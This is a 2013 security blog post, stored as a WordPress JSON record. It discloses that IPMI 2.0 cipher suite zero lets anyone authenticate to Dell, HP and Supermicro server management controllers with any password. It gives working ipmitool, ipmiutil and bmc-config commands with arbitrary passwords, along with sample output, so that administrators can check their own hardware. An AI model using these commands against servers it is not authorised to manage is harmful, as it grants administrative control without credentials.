{"id":769,"date":"2013-02-22T15:53:30","date_gmt":"2013-02-22T15:53:30","guid":{"rendered":"https:\/\/trouble.org\/?p=769"},"modified":"2013-03-10T07:52:51","modified_gmt":"2013-03-10T07:52:51","slug":"the-infamous-daryl-er-cipher-zero","status":"publish","type":"post","link":"https:\/\/trouble.org\/?p=769","title":{"rendered":"The infamous Daryl, er, Cipher Zero"},"content":{"rendered":"<blockquote><p><a href=\"https:\/\/trouble.org\/wp-content\/uploads\/2013\/02\/zero-effect.jpg\"><br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignright\" title=\"zero-effect\" alt=\"\" src=\"https:\/\/trouble.org\/wp-content\/uploads\/2013\/02\/zero-effect.jpg\" width=\"132\" height=\"204\" \/><\/a>Now, a few words on looking for things. When you go looking for something specific, your chances of finding it are <a href=\"https:\/\/trouble.org\/wp-content\/uploads\/2013\/02\/zero-effect.jpg\"><br \/>\n<\/a>very bad. Because of all the things in the world, you&#8217;re only looking for one of them. When you go looking for anything at all, your chances of finding it are very good. Because of all the things in the world, you&#8217;re sure to find <a href=\"https:\/\/trouble.org\/wp-content\/uploads\/2013\/02\/zero-effect.jpg\"><br \/>\n<\/a>some of them.<\/p><\/blockquote>\n<p style=\"padding-left: 90px;\">&#8211; daryl zero, The Zero Effect<\/p>\n<p>The Zero Effect is a weird, quirky movie about a detective I can relate to, although I&#8217;m not as smart. How many times have I looked for that one thing, and then found something more important that had nothing to do with it. Sometimes you simply have to keep your eyes open.<\/p>\n<p>The short version &#8211; Cipher Zero is the first Cipher in the IPMI 2.0 spec. \u00a0It allows you to authenticate to\u00a0IPMI\u00a0without a password &#8211; in other words, it&#8217;s really no cipher at all, or the un-cipher. \u00a0It removes all security from\u00a0IPMI. \u00a0But who cares, really? \u00a0Surely vendors wouldn&#8217;t turn this on by default, would they? \u00a0Well\u2026 it&#8217;s enabled on my Dell (iDRAC 6), HP (iLO 3), and Supermicro. \u00a0That&#8217;s all the systems I have access to, presumably there\u00a0are more. (Important note &#8211; it does need a valid user and IPMI channel for it to work, so <strong>mostly<\/strong> it wouldn&#8217;t work until the box was provisioned or turned on with at least one user.)<\/p>\n<p>Longer version: let&#8217;s see, to belabor the obvious. To execute an IPMI command, you can use good ol&#8217; bmc-config with the proper authentication:<\/p>\n<p style=\"padding-left: 30px;\"><em>$ bmc-config -D LAN_2_0 -I 0 -v -u root -p calvin -h 10.0.0.1 &#8211;checkout|grep -i cipher_suite_id_0<\/em><br \/>\n<em> Maximum_Privilege_Cipher_Suite_Id_0 Administrator<\/em><\/p>\n<p>You know, that line of output is not good. How not good is &#8220;not good&#8221;? Well, let&#8217;s try it again&#8230; this time with &#8220;FluffyWabbit&#8221; as the password:<\/p>\n<p style=\"padding-left: 30px;\"><em>$ bmc-config -D LAN_2_0 -I 0 -v -u root -p FluffyWabbit -h 10.0.0.1 &#8211;checkout|grep -i cipher_suite_id_0<\/em><br \/>\n<em> Maximum_Privilege_Cipher_Suite_Id_0 Administrator<\/em><\/p>\n<p>I guess this is neat. Or sad. Or something. You can try other passwords to verify FluffyWabbit isn&#8217;t some vendor hardcoded backdoor ;)<\/p>\n<p>I believe that IBM, as of the M2\/Nehalem generation, has essentially abolished cipher zero through the efforts of Jarred B Johnson (kudos to both!) I&#8217;m not sure who else still has this going on\u2026 but you might check your own boxes. \u00a0It&#8217;d be interesting to hear about the vendors that do have this on or off by default.<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #ff0000;\">DISCLAIMER<\/span> &#8211; various versions of the IPMI utilities &#8211; including bmc-config &#8211; <span style=\"color: #ff0000;\">WILL FAIL and give FALSE results<\/span>!\u00a0 They do not work correctly with cipher 0 and will fail; this misled me early on on my own boxes. The latest version of freeipmi seems to work on all the ones I&#8217;ve tested, at least; make sure you have downloaded the latest copy and try this to verify good ol&#8217; cipher 0 is still around.<\/p>\n<p>Most commands say they support it; ensure you have the latest version, bugs abound out there in the tools and\/or in the BMCs, but bmc-config seems pretty solid on this. Some other options for popular utilities:<\/p>\n<p style=\"padding-left: 30px;\"><em>$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U admin -P FluffyWabbit lan print<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>$ ipmiutil lan -J 0 -N 10.0.0.1 -U admin -P FluffyBunny<\/em><\/p>\n<p>Ipmiutil has a nice printing of the results &#8211; anything in the RMCP+ line that looks like a zero is bad :)<\/p>\n<p style=\"padding-left: 30px;\">$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U root -P calvin lan print<br \/>\nSet in Progress : Set Complete<br \/>\nAuth Type Support : NONE MD2 MD5 PASSWORD<br \/>\nAuth Type Enable : Callback : MD2 MD5<br \/>\n: User : MD2 MD5<br \/>\n: Operator : MD2 MD5<br \/>\n: Admin : MD2 MD5<br \/>\n: OEM :<br \/>\nIP Address Source : Static Address<br \/>\nIP Address : 192.168.0.23<br \/>\nSubnet Mask : 255.255.255.0<br \/>\nMAC Address : 14:fe:b5:c7:df:28<br \/>\nSNMP Community String : public<br \/>\nIP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10<br \/>\nDefault Gateway IP : 192.168.0.1<br \/>\nDefault Gateway MAC : 00:00:00:00:00:00<br \/>\nBackup Gateway IP : 0.0.0.0<br \/>\nBackup Gateway MAC : 00:00:00:00:00:00<br \/>\n802.1q VLAN ID : Disabled<br \/>\n802.1q VLAN Priority : 0<br \/>\n<span style=\"color: #ff0000;\">RMCP+ Cipher Suites : 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14<\/span><br \/>\nCipher Suite Priv Max : aaaaaaaaaaaaaaa<br \/>\n: X=Cipher Suite Unused<br \/>\n: c=CALLBACK<br \/>\n: u=USER<br \/>\n: o=OPERATOR<br \/>\n: a=ADMIN<br \/>\n: O=OEM<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Now, a few words on looking for things. When you go looking for something specific, your chances of finding it are very bad. Because of all the things in the world, you&#8217;re only looking for one of them. When you go looking for anything at all, your chances of finding it are very good. Because [&hellip;]<\/p>\n","protected":false},"author":44,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[176,154,4],"tags":[207,208,113,209,205,206,210],"class_list":["post-769","post","type-post","status-publish","format-standard","hentry","category-embedded","category-ipmi-2","category-security","tag-cipher-0","tag-daryl-zero","tag-ipmi","tag-movie","tag-oops","tag-they-did-it-again","tag-well-this-sucks"],"_links":{"self":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/769","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/users\/44"}],"replies":[{"embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=769"}],"version-history":[{"count":26,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/769\/revisions"}],"predecessor-version":[{"id":810,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/769\/revisions\/810"}],"wp:attachment":[{"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=769"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=769"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=769"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}